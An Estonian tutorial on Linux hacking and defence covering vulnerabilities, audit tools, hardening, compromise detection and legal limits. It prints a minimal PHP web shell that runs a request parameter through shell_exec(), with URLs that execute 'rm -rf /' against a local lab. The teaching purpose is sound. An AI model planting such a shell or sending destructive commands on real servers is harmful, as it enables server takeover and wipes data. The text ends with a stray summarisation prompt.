Linuxi häkkimise õpetus: Ubuntu Käsklused ja tööriistad

⚡ Nutikas kokkuvõte

Linuxi häkkimine on Linuxi süsteemide nõrkuste leidmise ja ärakasutamise praktika ning see leht selgitab ründajate sihiks olevaid haavatavusi, kasutatavaid auditeerimisvahendeid ja serveri kaitsmiseks mõeldud kontrolle.

  • 🐧 Miks see on oluline: Linux käitab enamikku veebiservereid ja pilveteenuseid, mis teeb sellest väärtusliku sihtmärgi.
  • 🔍 Avatud lähtekoodiga tarkvara kompromiss: Avalik lähtekood aitab hooldajatel kiiresti vigu parandada ja ründajatel vigu otsida.
  • 🧰 Auditi tööriistad: Nessus, Nmap, Lynis ja OpenVAS paljastada avatud porte, puuduvaid parandusi ja nõrka konfiguratsiooni.
  • ???? Rünnaku vektorid: Enamiku ohtude põhjuseks on nõrgad SSH-mandaadid, parandamata kernelid, vale konfiguratsioon ja veebikestad.
  • 🛡️ Kõvenemine: Paranduste haldus, SSH tugevdamine, vähimate õiguste piiramine ja kohustuslik juurdepääsukontroll vähendavad järsult haavatavust.
  • ???? Märkamine: Auditeerimislogid, failide terviklikkuse kontrollid ja sissetungimise tuvastamine paljastavad rikkumise enne kahju levikut.

Linuxi häkkimise õpetus

Linux on kõige laialdasemalt kasutatav serverite operatsioonisüsteem, eriti veebiserverite jaoks. See on avatud lähtekoodiga, mis tähendab, et igaüks saab lähtekoodi lugeda. See läbipaistvus on mõlemapoolne: hooldajad kasutavad seda vigade kiireks leidmiseks ja parandamiseks, samas kui ründajad uurivad sama koodi, otsides nõrkusi, mida ära kasutada. Linuxi häkkimine on nende nõrkuste ärakasutamine süsteemile volitamata juurdepääsu saamiseks.

Allolevad osad käsitlevad Linuxit, seda mõjutavaid turvaauke, praktilist pilku häkkimisele Ubuntuja vastumeetmed, mida saate rakendada.

Kiire märkus Linuxi kohta

Linux on avatud lähtekoodiga operatsioonisüsteem. Sellele on ehitatud palju distributsioone, sealhulgas Red Hat Enterprise Linux, Fedora, Debian ja UbuntuKuna lähtekood on avaldatud, saavad teadlased, müüjad ja ründajad seda kontrollida. Ründajad kasutavad seda juurdepääsu ärakasutatavate vigade otsimiseks, samas kui sama nähtavus võimaldab hooldajatel parandusi kiiremini saata, kui suletud platvormid sageli suudavad. Linux töötab serveri, lauaarvuti, tahvelarvuti või mobiilseadme operatsioonisüsteemina.

Linuxi programme saab juhtida graafilise liidese või käsurea kaudu. Käsurea abil töötamine on kiirem ja täpsem kui graafilise kasutajaliidese kaudu klõpsamine, mistõttu turvatestijad, kes töötavad selliste distributsioonidega nagu Kali Linux veedavad peaaegu kogu oma aja terminalis. Seega on põhikäskude tundmine praktiline eeltingimus.

Vaadake seda Linuxi õpetus põhitõdede ja Kali Linux juhendaja nende peale ehitatud turvalisusele keskendunud jaotuse jaoks.

Levinumad Linuxi turvanõrkused ja rünnakuvektorid

Linuxi rünnakud tuginevad harva eksootilistele ohtudele. 2025. ja 2026. aastal avaldatud telemeetria näitab, et enamik ohtusid tracpöördume tagasi väikese hulga korduvate nõrkuste juurde ja nende tundmine annab sulle märku, kuhu kõigepealt kaitsepingutusi suunata.

  • Nõrgad või taaskasutatud SSH-mandaadid — Suurem osa Linuxi lõpp-punktides täheldatud vaenulikust tegevusest on suunatud internetiühendusega SSH vastu suunatud jõhkra jõu ja volituste täitmise katsetele.
  • Parandamata kerneli ja paketi vead — Linuxi kerneli meeskonnast sai 2024. aastal CVE nummerdamise amet ning teatatud kerneli CVE-de arv tõusis 2023. aasta umbes 290-lt järgmisel aastal enam kui 3,500-le, seega tekivad paranduste mahajäämused kiiresti.
  • Vale konfiguratsioon — vaikekontod, mittevajalikud deemonid, kõigile kirjutatavad failid ja lubavad sudo reeglid annavad õigusi, mille saamiseks polnud vaja mingit ärakasutamist.
  • Haavatavad veebirakendused — sellised vead nagu SQL süstimine ja saidiülene skriptimine võimaldab ründajal serverini jõuda rakenduse, mitte operatsioonisüsteemi kaudu. Veebikestad on kõige levinum pahatahtlik artefakt, mida leidub ohustatud Linuxi serverites.
  • Privileegide eskaleerimise vead — lokaalsed vead, mis muudavad piiratud konto root-kasutajaks. Mõned neist on kernelis avastamata säilinud enam kui kümme aastat enne avalikustamist.
  • Tarneahela ja sõltuvuse risk — kolmandate osapoolte paketid, keeleteegid ja konteinerikujutised tõmbavad sisse koodi, mida keegi operatsioonimeeskonnast pole üle vaadanud.

Ükski neist ei nõua Linuxi enda alistamiseks ründaja olemasolu. 2025. aasta sissetungide analüüsid näitasid, et umbes neli viiest ei hõlmanud üldse pahavara, vaid tuginesid hoopis valele konfiguratsioonile ja varastatud volitustele.

Linuxi häkkimise tööriistad

Turvatestijad ja süsteemiadministraatorid kasutavad samu skannereid: üks pool nõrkuste leidmiseks enne ründajat, teine ​​pool paranduste kehtivuse kinnitamiseks. Allpool on toodud tööriistad, mida Linuxi hosti auditeerimiseks kõige sagedamini kasutatakse.

Vahend KASUTUSALA litsents Tüüpiline kasutus Linuxis
Nessus Haavatavuste skanner Kaubandus- Skannib konfiguratsioonisätteid, puuduvaid parandusi ja võrguteenuseid segakeskkondades.
Nmap Võrgu- ja portide skanner Avatud lähtekoodiga Tuvastab serveris töötavad hostid, nende pakutavad teenused ja avatud pordid.
Lynis Hosti auditeerimine ja tugevdamine Avatud lähtekoodiga Auditeerib töötavat süsteemi karastavate võrdlusaluste suhtes ja annab aru konkreetsetest parandusmeetmetest.
OpenVAS Haavatavuste skanner Avatud lähtekoodiga Võrgu haavatavuste skannimine, mida haldab Greenbone oma kogukonnaväljaande osana.

See loetelu ei ole ammendav; see annab aimu auditeerimiseks saadaolevatest tööriistadest. Ubuntu ja teised Linuxi süsteemid. Vanemad juhendid soovitavad endiselt SARA-d, Security Auditor's Research Assistantit, kuid selle viimane versioon pärineb aastast 2009 ja projekti sait on võrguühenduseta, seega Lynis ja OpenVAS on säilitatud alternatiivid.

Häkkimistegevus: häkkimine a Ubuntu Linuxi süsteem, mis kasutab PHP-d

Selles praktilises stsenaariumis vaatleme PHP näitel, kuidas Linuxi hostiga veebirakenduse kaudu ühendust saada. Sihikule ei võeta ühtegi reaalajas ohvrit. Kui soovite seda proovida, installige oma arvutisse LAMPP, XAMPP-i Linuxi versioon.

PHP on varustatud kahe funktsiooniga, mida saab kasutada operatsioonisüsteemi käskude käivitamiseks: exec() ja shell_exec(). Funktsioon exec() tagastab käsu väljundi viimase rea, samas kui shell_exec() tagastab käsu kogu tulemuse stringina.

Demonstratsiooni eesmärgil oletame, et ründajal õnnestub järgmine fail veebiserverisse üles laadida.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

SIIN,

Ülaltoodud skript võtab käsu GET-muutujast nimega cmd. Käsk käivitatakse shell_exec() abil ja tulemus tagastatakse brauseris.

Ülaltoodud koodi saab ära kasutada järgmise abil URL

http://localhost/cp/konsole.php?cmd=ls%20-l

SIIN,

  • „…konsole.php?cmd=ls%20-l” määrab muutujale cmd väärtuse ls –l.

Käsk peal Ubuntu server käivitatakse seega järgmiselt

shell_exec('ls -l') ;

Ülaltoodud koodi käivitamine veebiserveris annab sarnase tulemuse.

PHP-skripti brauseri väljund, mis loetleb kataloogi sisu ja failiõigused Ubuntu server

Väljund kuvab lihtsalt praeguses kataloogis olevad failid ja nende õigused.

Oletame nüüd, et ründaja edastab hoopis järgmise käsu.

rm -rf /

SIIN,

  • „Rm” eemaldab failid.
  • „rf” paneb rm-käsu tööle rekursiivses režiimis, kustutades kõik kaustad ja failid.
  • „/“ annab käsule korralduse alustada kustutamist juurkataloogist.

Rünnak URL näeks välja umbes selline

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Seega piisab ühest valideerimata parameetrist, et anda ründajale kõik veebiserveri konto õigused. Järgnevad kaks osa on loodud selleks, et seda peatada ja kui ennetamine ebaõnnestub, see kinni püüda.

Kuidas vältida Linuxi häkke

Linuxi häkkimine kasutab ära operatsioonisüsteemi ja sellel töötava tarkvara haavatavusi. Organisatsioon saab enamiku eespool kirjeldatud puuduste sulgemiseks rakendada järgmisi kontrollimeetmeid, mida rakendatakse koos.

  • Plaastrihaldus — parandused parandavad vigu, mida ründajad süsteemi ohtu seadmiseks ära kasutavad. Kindlalt määratletud poliitika tagab, et asjakohased värskendused rakendatakse viivitamatult, mitte siis, kui keegi neid mäletab.
  • Õige OS-i konfiguratsioon — keelake mitteaktiivsed kasutajakontod ja mittevajalikud deemonid. Muutke vaikesätteid, sh vaikekasutajanimesid, jagatud rakenduste paroole ja vaikeportide numbreid.
  • SSH kõvendamine — keelata root-kasutaja sisselogimise ja parooliga autentimise, lubada ainult nimelisi kasutajaid või gruppe ning piirata autentimise uuestikatsete arvu. See sulgeb Linuxi kõige tugevamalt rünnatud sisenemispunkti.
  • Vähim privileeg — anna kontodele ja teenustele ainult vajalikud õigused ning piira sudo käsu kasutamist kindlate käskudega üldise administraatoriõiguse asemel.
  • Kohustuslik juurdepääsu kontroll — säilitage SELinuxi (Red Hati perekond) või AppArmori (Debian ja Ubuntu) jõustamisrežiimis, nii et ohustatud teenus ei pääse ülejäänud süsteemini.
  • Sisendi valideerimine — ülaltoodud demonstratsioon töötab ainult seetõttu, et päringuandmed jõuavad shellifunktsioonini. Ärge kunagi edastage kasutaja sisendit exec()-ile ega shell_exec()-ile.
  • Tulemüürid ja segmenteerimine — avaldage ainult need pordid, mida teenus tegelikult vajab, kasutades tulemüüri ja võrgu segmenteerimine, et piirata seda, millele ohustatud host ligi pääseb.
  • Sissetungi tuvastamise süsteemid — selliseid tööriistu saab kasutada süsteemile volitamata juurdepääsu tuvastamiseks ja mõned suudavad ka katse blokeerida.
  • Testitud varukoopiad — võrguühenduseta taastatavad varukoopiad muudavad ülaltoodud hävitava käsu katkestuseks, mitte püsivaks kaotuseks.

Kuidas tuvastada kahjustatud Linuxi süsteemi

Ennetamine lõpuks ebaõnnestub, seega on teine ​​küsimus, kui kiiresti te seda märkaksite. Linuxis sõltub tuvastamine õigete tõendite kogumisest enne intsidenti, mitte pärast seda.

  • Auditi logimine — kerneli auditeerimisraamistik auditd salvestab privileegide kasutamise, failidele juurdepääsu ja süsteemikõned kujul, mida ohustatud protsess ei saa vaikselt ümber kirjutada. Edasta need logid hostist kesksele kogujale.
  • Autentimislogid — klassikaline toore jõu signatuur on ebaõnnestumiste seeria, millele järgneb üks edukas tulemus failis /var/log/auth.log või /var/log/secure.
  • Ootamatud protsessid ja ühendused — pealtkuulamisteenus või väljaminev ühendus, millega keegi ei oska arvestada, väärib viivitamatut uurimist.
  • Failide terviklikkuse jälgimine — tööriistad, mis räsivad süsteemi binaarfaile ja konfiguratsioonifaile, märgistavad muudatusi failides, mis ei tohiks kunagi muutuda.
  • Ajastatud ülesanded ja käivitusüksused — püsivus maandub tavaliselt cron-töödesse, systemd-üksustesse või shelliprofiili skriptidesse.
  • Uued või muudetud kontod — otsi tundmatuid kasutajaid, teisi kontosid UID-ga 0 ja SSH-võtmeid, mida pole lisatud.
  • Veebiserveri kataloogid — kuna veebikestad on Linuxi serverites kõige levinumad pahatahtlikud failid, väärivad veebijuure all olevad ootamatud skriptifailid suurt tähelepanu.
  • Planeeritud auditid — käitage ajakava alusel hostauditeerimistööriista, näiteks Lynist, ja käsitlege iga aruannet tööloendina, mitte ühekordse ülesandena.

Kui leiate tõendeid kompromiteerimise kohta, isoleerige host, säilitage logid ja kettakujutis enne millegi muutmist ning ehitage süsteem uuesti teadaolevalt korrasolevalt andmekandjalt, selle asemel et proovida töötavat süsteemi puhastada. Selle töö tõendite käitlemise pool on käsitletud jaotises digitaalne kohtuekspertiis.

Linuxi häkkimise õiguslikud ja eetilised piirid

Kõiki sellel lehel olevaid tehnikaid on seaduslik harjutada süsteemides, mis kuuluvad teile või mille testimiseks on teil kirjalik luba, ning peaaegu kõikjal mujal on need ebaseaduslikud. Ülaltoodud harjutus on just sel põhjusel teadlikult suunatud kohaliku installatsiooni vastu.

  • Kirjalik volitus — Allkirjastatud ulatus, kokkulepitud testimisaken ja nimetatud kontaktisik eristavad penetratsioonitesti süüteost. Suulisest kinnitusest ei piisa.
  • Jääge ulatuse piiresse — hostid, aadressivahemikud ja tehnikad, mida pole loetletud, pole lubatud isegi siis, kui need on kättesaadavad.
  • Andmete hoolikas käsitlemine — testi käigus kogutud tõendid sisaldavad endiselt tegelikke isikuandmeid ning need tuleb turvaliselt säilitada ja hiljem hävitada.
  • Teata vastutustundlikult — avalikustage leiud omanikule ja andke enne avaldamist aega parandamiseks.

Õiguslik oht on reaalne: volitamata juurdepääs arvutisüsteemile on kriminaalkuritegu selliste seaduste alusel nagu USA arvutipettuste ja -kuritarvituse seadus ning Ühendkuningriigi arvutiväärkasutuse seadus. Kui soovite nendele oskustele tuginedes karjääri rajada, valige tunnustatud tee – a turvasertifikaat pluss labor, mis kuulub sulle, mitte kellegi teise server.

KKK

Linuxi eeliseks on range kasutajate eraldamine ja väiksem töölaua rünnakupind, seega puutub see kokku palju vähem tavaliste pahavaradega. Serveritega kokkupuude on aga hoopis teine ​​lugu – internetiühendusega Linuxi hoste rünnatakse pidevalt ja konfiguratsiooni kvaliteet määrab tulemuse.

Allkirjade skannimine on abiks faili- ja meiliserverites, mis haldavad teiste platvormide sisu. Enamiku Linuxi hostide puhul pakuvad parandused, tugevdamine ja logipõhine tuvastamine suuremat väärtust, kuna enamik sissetungidest ei hõlma üldse pahavarafaili.

Masinõpe modelleerib hostis tavapäraste protsesside, sisselogimise ja võrgukäitumise baasjoone ning märgistab seejärel kõrvalekalded, mida fikseeritud reeglid ei täida – näiteks veebiserveri konto, mis tekitab kesta. Ründajad kasutavad luure kiirendamiseks samu tehnikaid, nii et mõlemad pooled liiguvad edasi.

GitHubi koopia oskab otse küsimisel soovitada parameetrilisi päringuid ja turvalisemaid alternatiive shellikõnedele. See treenib avaliku koodi peal, seega vajavad ettepanekud siiski ülevaatamist – käsitle seda esimese mustandi abilisena, mitte turvaskannerina.

Mõlemad on Debiani-põhised, aga Kali Linux sisaldab sadu eelinstallitud turva- ja kohtuekspertiisi tööriistu ning on loodud testimistööks. Ubuntu on üldotstarbeline lauaarvutite ja serverite jaotus ning parem valik igapäevaseks kasutamiseks.

Rakenda turvavärskendusi vähemalt kord kuus ja kriitiliste või teadaolevalt ohtudega seotud turvavärskenduste puhul paari päeva jooksul. Luba järelevalveta turvavärskendused ja ajasta taaskäivitused, et kerneli parandused tegelikult jõustuksid.

Alusta Linuxi administraatori volitustega, näiteks LPIC või RHCSA, lisa CompTIA Security+ ja seejärel liigu edasi praktilise penetratsioonitestimise või halduse juurde. tracks. Guru99 peab nimekirja küberturvalisuse sertifikaadid praeguste nõuetega.

Kasutage virtuaalmasinat oma riistvaral või heakskiidetud koolitusplatvormil, näiteks Proovi HackMe, kus sihtmärgid on just sel otstarbel ette nähtud. Ärge kunagi testige süsteemi, mis ei kuulu teile, ilma kirjaliku loata.

Võta see postitus kokku järgmiselt: